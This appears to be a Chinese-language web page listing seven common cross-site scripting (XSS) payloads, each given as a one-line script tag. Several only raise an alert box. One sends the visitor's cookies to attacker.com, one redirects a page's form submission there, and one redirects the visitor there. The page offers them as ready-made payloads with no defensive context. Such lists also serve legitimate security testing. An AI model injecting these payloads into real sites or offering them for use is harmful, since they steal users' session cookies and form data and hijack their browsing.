xss常用payload
时间: 2023-11-27 13:47:31 浏览: 123
xss常见payload脚本
5星 · 资源好评率100%
以下是几种常用的XSS Payload:
1. 弹窗XSS Payload:
```html
<script>alert('XSS')</script>
```
2. Cookie劫持XSS Payload:
```html
<script>document.location='http://attacker.com/cookie.php?cookie='+document.cookie</script>
```
3. 钓鱼XSS Payload:
```html
<script>document.forms[0].action='http://attacker.com/submit.php';document.forms[0].submit();</script>
```
4. 重定向XSS Payload:
```html
<script>document.location='http://attacker.com';</script>
```
5. 获取当前URL Xss Payload:
```html
<script>alert(document.location)</script>
```
6. 获取cookie Xss Payload:
```html
<script>alert(document.cookie)</script>
```
7. 获取用户信息 Xss Payload:
```html
<script>alert(navigator.userAgent)</script>
```
阅读全文